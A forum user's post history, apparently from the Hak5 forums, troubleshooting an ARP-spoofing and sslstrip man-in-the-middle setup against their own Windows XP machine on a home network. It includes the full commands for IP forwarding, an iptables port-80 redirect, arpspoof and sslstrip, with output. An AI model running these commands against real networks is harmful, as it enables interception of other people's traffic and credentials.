Jump to content

Orange Chicken

Active Members
  • Posts

    6
  • Joined

  • Last visited

Everything posted by Orange Chicken

  1. Thanks guys, I'll give it a try plugged in.
  2. Yes, I can normally access the internet on my ubuntu box. My output for route is Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.1.0 * 255.255.255.0 U 2 0 0 wlan0 link-local * 255.255.0.0 U 1000 0 0 wlan0 default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0 thanks
  3. I would very much appreciate a lesson in creating my own packets. thank you.
  4. Burning Aces, my post is not about ettercap and I have read the manual pages as well as many other sources on ettercap. I can use it but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of hak5 and have been for some time, but that does not mean that I get all of my information here, I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interrested in solving this arpspoof issue. Thanks for your input, but my issue remains the same.
  5. I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running wireshark, but to respond newbishly to your suggestion I'll tell you what i noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that http traffic is halted, but in wireshark I can still see outgoing requests for webpages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap so that's out of the question at the moment. I'm anxiously awaiting a hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions. Thanks for the ones so far.
  6. Hello everyone. After many issues with ettercap I saw Darren's segment on sslstrip. I noticed he was using one of the Dsniff tools so I decided to give it a try. I run ubuntu 9.10 on my laptop and windows xp on my desktop. The steps I used were the same a Darren's in the show. My shell output for all of this is: anon@ubuntu:~$ sudo su [sudo] password for anon: root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forwardroot@ubuntu:/home/anon# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 root@ubuntu:/home/anon# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 192.168.1.106 is my xp box (victim) and 192.168.1.1 is of course the default gateway. Then I cd to sslstrips folder "cd /home/anon/Downloads/sslstrip-0.7" and run it on port 8080 with "python sslstrip.py -l 8080" So my issue is that when I try to surf the internet on the victim pc I get a Server not found page every time. Thanks for the help guys and gals. P.S. I don't know if this makes a difference, but just for the heck of it the router is a linksys wrt54g. Thanks in advance
×
×
  • Create New...